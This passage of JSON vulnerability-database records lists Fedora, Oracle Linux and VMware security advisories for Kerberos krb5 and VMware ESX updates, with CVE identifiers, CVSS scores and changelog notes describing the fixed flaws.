"CVE-2007-4743"], "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "modified": "2007-09-07T17:21:06", "published": "2007-09-07T17:21:06", "id": "FEDORA:L87HKEOO000802", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: krb5-1.6.1-4.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3084", "CVE-2006-6143", "CVE-2007-0956", "CVE-2007-0957", "CVE-2007-1216", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798"], "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "modified": "2007-06-28T13:30:51", "published": "2007-06-28T13:30:51", "id": "FEDORA:L5SDUP1B005917", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 5 Update: krb5-1.4.3-5.5", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0956", "CVE-2007-0957", "CVE-2007-2442", "CVE-2007-2443", "CVE-2007-2798", "CVE-2007-3999", "CVE-2007-4000", "CVE-2007-4743", "CVE-2007-5901", "CVE-2007-5971", "CVE-2008-0062", "CVE-2008-0063", "CVE-2008-0947"], "description": "Kerberos V5 is a trusted-third-party network authentication system, which can improve your network's security by eliminating the insecure practice of cleartext passwords. ", "modified": "2008-03-21T22:18:10", "published": "2008-03-21T22:18:10", "id": "FEDORA:M2LMMNJ4021372", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: krb5-1.6.1-9.fc7", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:14", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1216", "CVE-2006-3083", "CVE-2006-3084"], "description": " [1.3.4-46]\n - fix bug ID in changelog\n \n [1.3.4-45]\n - add preliminary patch to fix buffer overflow in krb5kdc and kadmind\n (#231528, CVE-2007-0957)\n - add preliminary patch to fix double-free in kadmind (#231537, CVE-2007-1216)\n \n [1.3.4-44]\n - temporarily disable bug fixes for #143289, #179062, #180671, #202191, #223669\n for security update\n - add preliminary patch to correct unauthorized access via krb5-aware telnet\n daemon (#229782, CVE-2007-0956)\n \n [1.3.4-43]\n - re-enable fixes for #143289, #223669 and rebuild\n \n [1.3.4-42]\n - temporarily back out fixes for #143289, #223669 and rebuild\n \n [1.3.4-41]\n - update rcp non-fatal error patch to fix hangs on write errors, too (Jose\n Plans, #223669)\n \n [1.3.4-40]\n - report a non-fatal error to the remote rcp when the client fails to open a\n file for writing (#223669)\n \n [1.3.4-39]\n - refrain from killing any lingering members of our child's process group when\n logging that the child process has exited (Jose Plans, #143289)\n \n [1.3.4-38]\n - correct syntax error in krb5-config.sh\n \n [1.3.4-37]\n - update to revised upstream patches for CVE-2006-3083 and CVE-2006-3084\n (MITKRB5-SA-2006-001) to avoid unnecessary error messages from ksu (#209512)\n \n [1.3.4-36]\n - add missing shebang headers to krsh and krlogin wrapper scripts (#209238)\n \n [1.3.4-35]\n - backport changes to make krb5-devel multilib-safe (#202191, prereq for\n \n [1.3.4-34]\n - reapply changes for #198633, #179062, #180671\n \n [1.3.4-33]\n - temporarily revert changes for #198633\n \n [ 1.3.4-32]\n - rebuild\n \n [1.3.4-31]\n - temporarily revert changes for #179062\n - temporarily revert changes for #180671\n - apply patch to fix unchecked calls to setuid() (CVE-2006-3083) and\n seteuid() (CVE-2006-3084) (#197818)\n \n [1.3.4-30]\n - incorporate fixes for hangs in the rsh client and server (#198633)\n \n [1.3.4-29]\n - if we fail to determine the name of a master KDC in\n krb5_get_init_creds_keytab(), return the error we got from the non-master\n rather than the can't-determine-the-name error, which isn't so useful,\n matching the current release's behavior (#180671)\n \n [1.3.4-28]\n - reenable the fix for #179062 ", "edition": 4, "modified": "2007-04-04T00:00:00", "published": "2007-04-04T00:00:00", "id": "ELSA-2007-0095", "href": "http://linux.oracle.com/errata/ELSA-2007-0095.html", "title": "Critical: krb5 security update ", "type": "oraclelinux", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2019-11-06T16:05:54", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1056", "CVE-2007-1667", "CVE-2005-3273", "CVE-2007-1351", "CVE-2006-1343", "CVE-2007-0957", "CVE-2007-0956", "CVE-2007-1352", "CVE-2007-1216", "CVE-2006-2071", "CVE-2005-3055", "CVE-2006-1864", "CVE-2006-1342"], "description": "Problems addressed by these patches: \n \na. An updated Service Console XFree86 package that fixes a number of security issues \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following names CVE-2007-1003, CVE-2007-1351, CVE-2007-1352, and CVE-2007-1667 to these issues \n \nESX 2.5.4 Upgrade Patch 9 (Build# 47255) \nESX 2.5.3 Upgrade Patch 12 (Build# 47274) \nESX 2.1.3 Upgrade Patch 7 (Build# 47243) \nESX 2.0.2 Upgrade Patch 7 (Build# 47268) \n \nb. Upgraded UP and SMP kernels for ESX Server 2.5.4 fix a number of security issues. \n \nThe Common Vulnerabilities and Exposures project \n(cve.mitre.org) has assigned the names CVE-2005-3055, CVE-2005-3273, \nCVE-2006-1056, CVE-2006-1342, CVE-2006-1343, CVE-2006-1864, and \nCVE-2006-2071 to this issue. The new kernel version is 2.4.9-e.71. \n \nESX 2.5.4 Upgrade Patch 9 (Build# 47255) \n \nc. An update to the Kerberos network authentication packages provided in \nthe VMware ESX Server Service Console. Possible vulnerabilities have \nbeen found with the krb5 telnet daemon, the Kerberos KDC, and kadmin. \n \nAlthough these features are not enabled in the Service Console by default, \nVMware recommends that all users apply this patch. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) assigned \nthe names CVE-2007-0956, CVE-2007-0957, and CVE-2007-1216 to this issue. \n \nVMware ESX 3.0.1 without patch ESX-1000073 \nVMware ESX 3.0.0 without patch ESX-1000080\n", "edition": 4, "modified": "2007-07-05T00:00:00", "published": "2007-07-05T00:00:00", "id": "VMSA-2007-0005", "href": "https://www.vmware.com/security/advisories/VMSA-2007-0005.html", "title": "Updated Service Console packages (XFree86, UP and SMP kernels, Kerberos libraries) resolve security issues.", "type": "vmware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}